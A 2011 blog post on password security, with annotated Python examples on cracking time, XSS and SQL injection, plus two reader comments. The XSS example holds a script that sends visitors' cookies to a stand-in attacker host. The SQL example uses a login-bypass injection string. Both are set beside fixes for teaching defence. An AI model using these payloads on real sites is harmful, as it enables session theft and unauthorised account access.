Thursday, November 24, 2011

Give Me Your Password Punk!


If you immediately felt like spouting off the one password that you use for all your social networking sites, email accounts, and everything else, DON'T DO THAT! There are enough ways for malicious people to get at your valuable information and accounts without you handing it to them. Let me give you a look behind the computer screens of password thieves around the globe.

Let me tell you, it does not have to be a huge deal to get access to your password. I used to be a security adviser for websites, and occasionally still help out websites that I find flaws in. I could show anyone reading this how to get access to somebody's personal information in half an hour. (I won't, but I could.) You may ask, "If it is that easy, then how do I protect myself?"

Make it Harder for them:
The correct response to someone waving a gun and asking for your password is, "Which one?" The biggest mistake you can make is using the same username and password for everything you do. If one of your accounts is breached with any of the techniques I highlight below, and you have the same login credentials for every nook and cranny you occupy on the internet, you are in big trouble. Change those passwords! Do not make it easy for anybody to take over your whole online presence.

I have created a hierarchy of passwords, based on my security needs and how much I can trust the website. I use a different password for each of my e-mail accounts. (E-mail accounts need the most security, because you can reset the rest of your passwords with them.) Then social sites get a very secure password of their own. For smaller and less secure sites I use another password altogether, giving me more lines of defense between me and the potential hacker/cracker.

Password Complexity:
The most straightforward approach to obtaining a password is to "brute force" it: an array of cracking programs will simply guess passwords, one at a time. Against a live login form, the website you are using should lock the account or throttle after some maximum number of failed attempts, but let us not leave this up to chance. Bear in mind, too, that a lockout only protects the login form. If the site's password database leaks, the attacker runs the same guessing offline against the stored hashes, at millions or billions of guesses per second, and no lockout applies.

The programs that "crack" passwords use dictionaries of common words and previously leaked passwords first, and then alphanumeric combinations, to nail down your account. You want to make this as hard as possible, and length is what helps most: every extra character multiplies the number of guesses needed. Use How Secure Is My Password to get a rough idea of how long it would take a cracker to get in. That site is also good at catching pitfalls like using a commonly used password.
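The rough arithmetic behind that site, as an added example that is not part of the original post: a wordlist hit costs only as many guesses as the list is long, while a brute force has to cover the whole alphabet the password draws from, raised to its length. The six-entry wordlist and the two guess rates (a throttled login form versus a GPU working on a leaked fast hash) are constructed assumptions for illustration, not measurements.

```python
import math
import string

# Constructed stand-in for a cracker's wordlist. A real one holds millions of
# entries harvested from earlier breaches; six are enough to show the check.
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein", "monkey", "iloveyou"}

# Assumed guess rates in guesses per second (illustrative, not measured).
# Online: a throttled login form. Offline: a GPU against a leaked fast hash.
ONLINE_RATE = 10
OFFLINE_RATE = 10_000_000_000


def charset_size(password):
    """Size of the alphabet a brute-forcer must cover to include this password."""
    size = 0
    if any(c in string.ascii_lowercase for c in password):
        size += 26
    if any(c in string.ascii_uppercase for c in password):
        size += 26
    if any(c in string.digits for c in password):
        size += 10
    if any(c in string.punctuation for c in password):
        size += len(string.punctuation)  # 32 symbols
    if any(c.isspace() for c in password):
        size += 1
    if any(c not in string.printable for c in password):
        size += 100  # rough allowance for non-ASCII characters
    return size


def guesses_needed(password):
    """Worst-case guesses: a wordlist hit falls first, otherwise exhaust the alphabet."""
    if password in COMMON_PASSWORDS:
        return len(COMMON_PASSWORDS)
    return charset_size(password) ** len(password)


def entropy_bits(password):
    """Guess count expressed in bits, the usual way strength is quoted."""
    return math.log2(guesses_needed(password))


def seconds_to_crack(password, rate):
    return guesses_needed(password) / rate


def humanize(seconds):
    """Round a duration to the largest sensible unit."""
    for name, size in (("years", 365 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {name}"
    return f"{seconds:.3g} seconds"


def report(password):
    """Online vs offline cracking time for one password, as a dict."""
    return {
        "password": password,
        "bits": round(entropy_bits(password), 1),
        "online": humanize(seconds_to_crack(password, ONLINE_RATE)),
        "offline": humanize(seconds_to_crack(password, OFFLINE_RATE)),
    }


if __name__ == "__main__":
    for pw in ("password", "Tr0ub4dor&3", "correct horse battery staple"):
        print(report(pw))
```

The gap between the "online" and "offline" columns is the point: a site's lockout makes the first column look comfortable, and it is irrelevant the moment the hashes leak.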

How do I get Hacked?
Your head would spin if I outlined every way you could lose your online identity. I will give you the most common (and unfortunately easiest) ways, the ones that will eventually come your way.

Cross-site scripting (XSS) is a serious threat, and you will not know what hit you if you do not pay attention to where links take you. It happens when a website lets users insert their own content without filtering it, so an attacker can plant JavaScript on a page you trust; a well-disguised bit.ly link is a convenient way to get you onto that page. The planted script reads your cookies, or other information from the page, sends it to a server the attacker controls, and then redirects you back to the website so nothing looks wrong. Later the attacker looks through the log of everything the unknowing victims' browsers sent, uses the stolen session cookies to act as those users, and does what they please.

You can reduce the risk by not following unknown links or videos, by blocking scripts with a browser extension, or by turning off JavaScript altogether if you are really worried. (A well-run site also marks its session cookie HttpOnly so that scripts cannot read it in the first place, but that part is in the site's hands, not yours.)
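The server-side half of the story, as an added example that is not part of the original post: a page that pastes a user's comment straight into its HTML ships the attacker's script to every visitor, while the same page with HTML escaping shows the script as harmless text. The comment payload and the host evil.example are constructed for illustration, and the HttpOnly cookie header shows why a stolen-cookie script gets nothing from a properly flagged session.

```python
import html

# Constructed attacker "comment": posts the victim's cookies to a server the
# attacker controls (evil.example is a placeholder), then sends the victim back
# to a normal page so nothing looks wrong.
MALICIOUS_COMMENT = (
    '<script>'
    'new Image().src="http://evil.example/log?c="+encodeURIComponent(document.cookie);'
    'location.replace("/profile");'
    '</script>'
)

PAGE = "<html><body><h1>Comments</h1><p>{comment}</p></body></html>"


def render_vulnerable(comment):
    """Inserts user input straight into the page: stored XSS."""
    return PAGE.format(comment=comment)


def render_escaped(comment):
    """Escapes & < > \" ' so the browser treats the input as text, not markup."""
    return PAGE.format(comment=html.escape(comment, quote=True))


def contains_active_script(page):
    """Crude marker used here only to show which output a browser would execute."""
    return "<script>" in page.lower()


def session_cookie_header(value):
    """HttpOnly keeps document.cookie from ever seeing the session token;
    Secure keeps it off plain HTTP; SameSite=Lax limits cross-site sends."""
    return f"Set-Cookie: session={value}; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    print(render_vulnerable(MALICIOUS_COMMENT))
    print(render_escaped(MALICIOUS_COMMENT))
    print(session_cookie_header("d41d8cd98f00"))
```

Escaping output is the site's fix; the HttpOnly flag is the belt to go with those braces, because it makes the stolen `document.cookie` empty even when an injection does slip through.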

SQL injection is not really something that you can stop; it is a problem with the website you are using. When a site builds its database queries by pasting in whatever you typed, an attacker can type lines of code that get parsed by the database server and change the way the website was intended to work. I have personally used a mind-numbing, four-character, simple injection to gain access to account information and much more. I won't tell you what it is; you have to find it yourself. SQL injection is illegal as far as I know, so do not try it unless you have permission and you do not fear being sued!
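What "parsed on the server" means in practice, as an added example that is not part of the original post and not the four-character injection the author refers to: a login check that concatenates the username into its SQL lets a textbook payload comment out the password test, while the same check written with a parameterised query treats the payload as an ordinary (non-existent) username. The in-memory SQLite database and its two users are constructed for the demonstration.

```python
import sqlite3


def setup_db():
    """Constructed user table. Plaintext passwords are themselves a flaw,
    kept here only so the effect of the injection is easy to read."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "hunter2"), ("bob", "correct horse")])
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation: user input becomes SQL."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the driver sends the input as data, never as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Textbook payload: closes the string, makes the WHERE clause always true,
# and comments out the password comparison that follows.
INJECTION = "' OR 1=1 --"

if __name__ == "__main__":
    conn = setup_db()
    print("vulnerable, real creds :", login_vulnerable(conn, "alice", "hunter2"))
    print("vulnerable, injection  :", login_vulnerable(conn, INJECTION, "anything"))
    print("safe, injection        :", login_safe(conn, INJECTION, "anything"))
```

The vulnerable query ends up reading `WHERE username = '' OR 1=1 --' AND password = '...'`, so the database hands back the first user it finds and the attacker is logged in without knowing any password. The parameterised version never lets the quote or the comment marker reach the SQL parser.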

The moral of this story is to only trust websites that take security seriously, and, again, to use different passwords for different logins, so that one compromised site does not give away the rest.


Malicious admins are an often underestimated threat. Not only do they have access to the information on their own site, but if that site stores passwords in plain text (as far too many small sites do), they can read your login details and try them on other sites. Many users reuse the same password between sites. Use the same username and password on Google or Twitter as on some little forum, and you are done for.

If you want to learn more about your security, check out http://www.hackthissite.org/. It gives you a perfectly legal way to learn and test the methods that can be used against you. Please use it for educational purposes only!

If you have any other information that you think should have been added, tell me in the comments. You can also contact me via our Google+ page or Twitter. If you liked what you read, please let me know by sharing and liking!

2 comments:

  1. Any decent big-name website does a salted hash of your password when it stores it in the database, so malicious admins aren't a problem. It's a one-way encryption, so they can't just pull the data out of their SQL tables and use it. That means they have all your data EXCEPT your password, the most crucial part, and if you don't trust them with the rest of the data, don't register on that site. Likewise I'd like to point out this web comic as disproving common password complexity techniques and recommending new, stronger practices: http://xkcd.com/936/ and I'll throw in this gem: https://www.grc.com/haystack.htm
    Good day homie and peace out

  2. Yes, both valid points! I was talking about smaller websites that you may wish to use. That's why I added the bit about the hierarchy of passwords. I also love xkcd!

    Thanks, anon!
